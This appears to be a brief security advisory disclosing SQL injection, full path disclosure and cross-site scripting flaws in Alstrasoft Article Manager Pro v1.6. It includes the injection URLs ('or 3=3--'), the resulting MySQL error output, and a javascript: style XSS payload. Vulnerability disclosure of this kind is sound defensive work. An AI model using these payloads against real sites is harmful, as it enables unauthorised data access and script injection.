Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors Homepage: http://www.alstrasoft.com Description: Article Manager Pro is the next generation article publishing system designed to make your life a whole lot easier by enabling webmasters to publish articles or news into their website in a matter of minutes with our advance WYSIWYG editor that includes features such as a built-in spell checker, word finder and many more. Effected files: profile.php userarticles.php submit_article.php mraticles.php admin.php Exploits & Vulns: SQL Injection query error http://www.example.com/article/profile.php?author_id=1' 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL Injection: http://www.example.com/article/userarticles.php?aut_id=3 or 3=3-- Proof Of Concept: All articles in DB appear on page when the above query is preformed. Full path errors http://www.example.com/article/userarticles.php?aut_id=3' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html /article/functions.php on line 212 Invalid user id supplied! http://www.example.com/article/mrarticles.php?action=read' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html /article/mrarticles.php on line 50 http://www.example.com/article/admin/admin.php?login Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html /article/admin/auth.php on line 18 submit_article.php XSS Vuln. When submitting an article using the submit_article.php file, input is not filtered. All the user has to do is enter something like <DIV STYLE="background-image: url(javascript:alert('XSS'))">